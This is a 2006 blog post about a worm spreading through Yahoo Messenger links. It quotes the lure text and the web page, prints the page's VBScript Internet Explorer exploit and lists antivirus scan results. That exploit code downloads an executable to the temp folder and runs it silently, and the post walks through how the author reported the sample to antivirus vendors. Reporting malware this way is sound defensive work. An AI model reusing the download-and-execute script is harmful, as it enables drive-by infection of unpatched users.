yahoo messenger worm

Today I received two Yahoo messenger messages with very similar text, some thing like this:

Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?—-/nguyen/

I don’t know what does it mean, and take no responsibility if it means something nasty. Also I’ve added some dashes to it. Anyway, the URL in this message points to a web page with only these sentences on it:

Sao chẳng có gì để xem thế này hả trời !!!!!
Emperor cũng làm được như mấy thằng kia thôi ^_^ keke !!!

Tất cả bây giờ chỉ là con số KHÔNG

It is a worm which spreads itself using Yahoo! messenger, and infects unpatched IE users upon access to the website. You can find more information on its symptoms and removal on F-secure’s page and McAfee’s page.

This is the VB script inside that page, an old IE exploit:

<script language="VBScript">
    on error resume next
    dl = ""
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set x = df.CreateObject(str,"")
    set S = df.createobject(str5,"")
    S.type = 1
    x.Open str6, dl, False
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.write x.responseBody
    S.savetofile fname1,2
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

The fact that I have received the PM means the worm does work. I will update here if I get more data, and know if it is an old one or is just gone wild. IE users, watch out!

P.S.: My antivirus did not detect the EXE file after downloading it. So: watch out ^ 2


I checked the EXE file with and these are the results:

Antivirus Version Update Result
AntiVir 09.18.2006 no virus found
Authentium 4.93.8 09.18.2006 no virus found
Avast 4.7.844.0 09.15.2006 no virus found
AVG 386 09.18.2006 no virus found
BitDefender 7.2 09.18.2006 no virus found
CAT-QuickHeal 8.00 09.18.2006 TrojanDownloader.Agent.axn
ClamAV devel-20060426 09.18.2006 no virus found
DrWeb 4.33 09.18.2006 no virus found
eTrust-InoculateIT 23.72.127 09.16.2006 no virus found
eTrust-Vet 30.3.3084 09.18.2006 no virus found
Ewido 4.0 09.18.2006 no virus found
Fortinet 09.18.2006 no virus found
F-Prot 3.16f 09.18.2006 no virus found
F-Prot4 09.18.2006 no virus found
Ikarus 09.18.2006 no virus found
Kaspersky 09.18.2006 Trojan-Downloader.Win32.Agent.axn
McAfee 4854 09.18.2006 no virus found
Microsoft 1.1560 09.17.2006 no virus found
NOD32v2 1.1761 09.18.2006 no virus found
Norman 5.90.23 09.18.2006 no virus found
Panda 09.18.2006 no virus found
Sophos 4.09.0 09.18.2006 no virus found
Symantec 8.0 09.18.2006 no virus found
TheHacker 09.17.2006 no virus found
UNA 1.83 09.18.2006 no virus found
VBA32 3.11.1 09.18.2006 no virus found
VirusBuster 4.3.7:9 09.18.2006 no virus found

Apparently only Kaspersky and CAT-QuickHeal(?) detect it. According to Kaspersky’s, it was first detected on September 17 2006, yesterday.


After posting this blog entry, I submitted the worm sample (that EXE file it uses) to Avast! and F-Secure antivirus companies. Some hours later, F-secure reached me through e-mail and confirmed the fact it was a recently released worm:

The file, love.exe (181 KB), is verified to be malicious. It will be detected as Trojan-Downloader.Win32.Agent.axn on our next database update.

Their weblog has a note about it and another similar one here.

Ahmad, A friend of mine, had independently sent the file to McAfee AVERT. Some time later their automated system responded that the file was not a known virus, so it was “being forwarded to an AVERT Researcher for further analysis”. Some hours later, the promised researcher contacted him. He informed him that it was a new worm:

A.V.E.R.T. Sample Analysis
Issue Number: 2529850
Virus Research Engineer: *********
Identified: W32/YahLover.worm

Also, a EXTRA.DAT file was attached to this email.Removal instruction based on this DAT file and McAfee antivirus software was contained in the email as well.

No news from Avert! has been heard yet 🙂 Their latest update, today, does not detect the file to be infected.

When I tried to upload the file to a test Yahoo! mail message, their Symantec powered antivirus detected it as “W32.Yautoit”. Very good news for Yahoo! users.

And, by the way, this is the scan results of after 48 hours:

Antivirus Version Update Result AntiVir 09.20.2006 no virus found Authentium 4.93.8 09.20.2006 no virus found
Avast 4.7.844.0 09.19.2006 no virus found
AVG 386 09.20.2006 no virus found
BitDefender 7.2 09.20.2006 Win32.Worm.Sohanat.E
CAT-QuickHeal 8.00 09.20.2006 TrojanDownloader.Agent.axn
ClamAV devel-20060426 09.20.2006 no virus found
DrWeb 4.33 09.20.2006 Trojan.DownLoader.12971
eTrust-InoculateIT 23.73.0 09.20.2006 no virus found
eTrust-Vet 30.3.3088 09.20.2006 Win32/Tiotua.A
Ewido 4.0 09.20.2006 no virus found
Fortinet 09.20.2006 W32/Agent.AXN!tr.dldr
F-Prot 3.16f 09.20.2006 no virus found
F-Prot4 09.20.2006 no virus found
Ikarus 09.20.2006 no virus found
Kaspersky 09.20.2006 Trojan.Win32.Autoit.x
McAfee 4856 09.20.2006 W32/YahLover.worm
Microsoft 1.1560 09.19.2006 no virus found
NOD32v2 1.1764 09.20.2006 no virus found
Norman 5.90.23 09.20.2006 Agent.AWVY
Panda 09.20.2006 Adware/StartPage.AWD
Sophos 4.09.0 09.20.2006 Troj/Tiotua-A
Symantec 8.0 09.20.2006 no virus found
TheHacker 09.20.2006 no virus found
UNA 1.83 09.20.2006 Trojan.Win32.Autoit.4809
VBA32 3.11.1 09.19.2006 Trojan-Downloader.Win32.Agent.axn
VirusBuster 4.3.7:9 09.20.2006 no virus found

As you may note, F-prot has not included this in their recent update, but McAfee has.

BTW: I’m wondering that what would happen if the worm writer used this IE exploit instead of this old exploit. This new one works even in the fully patched windows machine.